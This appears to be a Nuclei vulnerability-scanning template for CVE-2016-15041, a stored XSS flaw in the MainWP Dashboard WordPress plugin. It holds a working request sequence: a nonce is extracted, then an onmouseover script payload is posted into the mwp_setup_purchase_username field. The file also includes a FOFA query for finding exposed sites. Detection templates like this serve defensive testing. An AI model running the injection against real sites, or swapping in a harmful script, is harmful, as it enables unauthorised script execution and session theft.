MainWP Dashboard <= 3.1.2 - Stored Cross-Site Scripting

id: CVE-2016-15041

info:
  name: MainWP Dashboard <= 3.1.2 - Stored Cross-Site Scripting
  author: flame
  severity: high
  description: |
    MainWP Dashboard – The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress versions up to 3.1.2 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in 'mwp_setup_purchase_username' parameter, letting unauthenticated attackers inject and execute arbitrary scripts when users access affected pages.
  impact: |
    Unauthenticated attackers can inject scripts that execute in users' browsers, potentially leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to the latest version of the plugin that addresses this vulnerability.
  reference:
    - https://klikki.fi/mainwp-admin-panel-unauthenticated-stored-xss/
  metadata:
    verified: true
    max-request: 4
    fofa-query: "/wp-content/plugins/mainwp/"
  tags: cve,cve2016,mainwp,wordpress,xss,wp,wp-plugin,vkev

variables:
  randstr: "{{rand_base(8)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/mainwp-vuln/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 3.1.2')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension&_wpnonce={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mwp_setup_purchase_username={{randstr}}"+onmouseover%3Dalert(document.domain)+x%3D"&mwp_setup_purchase_passwd=test&save_step=1

      - |
        GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '_wpnonce" value="([a-zA-Z0-9]+)"'
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "MainWP"
          - "Setup Wizard"
          - "mwp_setup_purchase_username"
        condition: and

      - type: word
        part: body_3
        words:
          - ' onmouseover=alert(document.domain) x'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100be4a0aab8a0674178125439960de423fe5845f9adec80cfdf9bf84be930aa8de02202f2ac43ce1b67d7fef376c9c5c8dc34b468ca363bf61a204d88655e6613c92f0:922c64590222798bb761d5b6d8e72950